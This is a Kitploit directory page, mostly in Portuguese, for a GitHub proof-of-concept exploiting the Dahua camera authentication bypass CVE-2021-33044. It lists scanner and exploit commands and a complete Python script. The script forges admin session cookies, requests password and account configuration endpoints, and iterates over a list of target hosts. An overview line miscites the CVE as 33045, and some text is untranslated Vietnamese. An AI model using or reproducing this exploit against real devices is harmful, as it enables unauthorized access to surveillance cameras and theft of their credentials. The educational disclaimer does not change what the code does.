Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
DAHUA_AUTH-BYPASS-CVE-2021-33044 — Camera Dahua Research lỗ hổng CVE-2021-33044 | Kitploit
Ferramentas/GitHubGitHub/eagle-nett/dahua_auth-bypass-cve-2021-33044
Authentication & AuthorizationIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubeagle-nett/dahua_auth-bypass-cve-2021-33044

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

DAHUA_AUTH-BYPASS-CVE-2021-33044

Camera Dahua Research lỗ hổng CVE-2021-33044

Ver Repositório
1há 4 mesesAinda não revisado

Simulação de exploração de bypass de autenticação Dahua PoC (CVE-2021-33044)

Visão geral

As câmeras IP Dahua são dispositivos IoT amplamente utilizados em sistemas de vigilância de segurança. Devido à sua implantação frequente em redes internas ou acesso pela Internet, vulnerabilidades de segurança em câmeras IP podem afetar seriamente a privacidade e a segurança da informação.

CVE-2021-33045 é uma vulnerabilidade de segurança que existe em algumas séries de câmeras Dahua, permitindo acesso não autorizado a recursos de configuração internos sem autenticação válida. Essa vulnerabilidade decorre de um mecanismo de controle de acesso frouxo no firmware do dispositivo.

Informações da vulnerabilidade

ItemConteúdo
CVECVE-2021-33044
TipoAuthentication Bypass
SeveridadeCritical (CVSS ~9.8)
AutenticaçãoNão requer autenticação
AfetadosDahua Camera / DVR / NVR

Causa

A vulnerabilidade decorre de um design de autenticação inseguro no firmware das câmeras Dahua:

  • O servidor não verifica corretamente sessão/token
  • Confia em dados enviados pelo cliente
  • Alguns endpoints de configuração sensíveis apenas verificam a existência de cookie, não verificam permissões reais de acesso

Isso permite que um invasor:

  • falsifique o processo de autenticação
  • ignore completamente o login

Referências:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

Como funciona o mecanismo de bypass de autenticação

Fluxo normal

root@kitploit:~
→ Client gửi HTTP request kèm cookie tùy ý
→ Camera kiểm tra cookie ở mức giao diện
→ Không xác minh session hợp lệ ở backend
→ Cho phép truy cập trực tiếp vào các endpoint cấu hình nội bộ
→ Trả về dữ liệu nhạy cảm

Cenário

Como usar

Instalação

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

Varredura de rede

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

Portas comuns Dahua: 80,443, 8080, 37777, 37778

Exploração de vulnerabilidade CVE

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

Bypass de autenticação

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

Exemplo

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

Explicação

  • O script usa a biblioteca requests e desativa ativamente os avisos SSL para desabilitar alertas SSL.

  • A função dump_accounts(ip, port=80) é a função principal responsável por verificar um dispositivo de câmera. As principais funções da função são:

    • Construir URL a partir do endereço IP e porta
    • Simular estado de login de administrador via cookie
    • Enviar requisições para endpoints de configuração sensíveis
    • Analisar resposta para determinar se o dispositivo está vulnerável
  • Simulação de cookie de autenticação. A função usa valores de cookie como:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • Nas versões de câmera afetadas, o backend não verifica o sessionID real, fazendo com que o sistema acredite que a requisição foi enviada de uma conta de administrador válida.

Loop de processamento da lista de alvos

O script lê a lista de alvos do arquivo de entrada, chamando a função de verificação para cada dispositivo. Essa abordagem permite avaliar várias câmeras automaticamente.

image

Desenvolvimento

Estes scripts foram desenvolvidos com base em:

  • Detalhes do CVE publicados pelo NVD
  • Avisos de segurança da Dahua
  • Referências públicas de PoC (seclists.org, packetstormsecurity)

Status de teste:

  • A lógica de bypass de autenticação foi implementada de acordo com as especificações do CVE
  • Testes limitados em dispositivos vulneráveis.

Observação

Este projeto:

  • Apenas para fins educacionais e de pesquisa
  • Execute em um ambiente de laboratório pessoal
Baixar ferramenta
FilePropósitoCVEs
dahua_scanner.pyDescoberta de rede — encontra câmeras Dahua na sub-redeDetecção
dahua_exploit.pyFerramenta de varredura Multi-CVE — verifica todas as vulnerabilidades de segurança.Todas
dahua_auth_bypass.pyBypass de autenticação dedicado com opção --dumpCVE-2021-33044